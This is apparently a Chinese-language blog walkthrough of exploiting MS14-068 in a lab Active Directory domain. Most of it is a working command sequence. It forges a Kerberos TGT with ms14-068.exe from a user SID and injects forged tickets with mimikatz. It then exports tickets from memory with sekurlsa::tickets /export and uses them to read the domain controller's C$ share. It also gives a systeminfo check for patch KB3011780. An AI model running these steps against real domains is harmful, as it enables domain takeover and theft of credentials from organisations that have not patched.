域渗透:MS14-068

1、生成TGT:

net config workstation

域渗透:MS14-068

ms14-068.exe -u yuyonghu01@top.pentest.top -s S-1-5-21-2174377853-1962599352-171107088-1128 -d top.pentest.top

域渗透:MS14-068

生成的票据:

域渗透:MS14-068

2、注入TGT:

先查看自己的klist 如果有的话 那么先清理掉 否则可能会导致无法成功
klist

域渗透:MS14-068

清理原来的票据:klist purge

域渗透:MS14-068

域渗透:MS14-068

清除票据的原因:https://www.t00ls.net/viewthread.php?tid=28727

利用mimikatz进行注入

非交互式中直接执行一句话
mimikatz.exe "kerberos::ptc TGT_yuyonghu01@top.pentest.top.ccache" exit

注入成功!

域渗透:MS14-068

查看票据:
klist

尝试访问域服务器,这里需要注意的不能用ip访问,因为是通过协议来进行认证的
dir \\WIN-CKT0M35R6UO.top.pentest.top\c$

域渗透:MS14-068

漏洞:MS14-068 补丁编号kb3011780

查看是否打补丁:systeminfo |find "3011780"

后门Export the ticket:

再导入票据之前先清除下票据,以防止之前实验的因素的干扰
klist purge

通过mimikatz导出内存中的Ticket,执行:
sekurlsa::tickets /export

如图:

域渗透:MS14-068

挑选其中的[0;7d8508]-2-0-60a00000-yuyonghu01@krbtgt-TOP.PENTEST.TOP.kribi在域普通用户的主机进行导入

域渗透:MS14-068

导入:
mimikatz "kerberos::ptt [0;7d8508]-2-0-60a00000-yuyonghu01@krbtgt-TOP.PENTEST.TOP.kirbi"

域渗透:MS14-068

尝试访问域控服务器:
dir \\WIN-CKT0M35R6UO.top.pentest.top\c$

域渗透:MS14-068

上一篇:【学习笔记】R语言生成GIF动态图


下一篇:Android Library上传到JCenter仓库实践,美团点评APP在移动网络性能优化的实践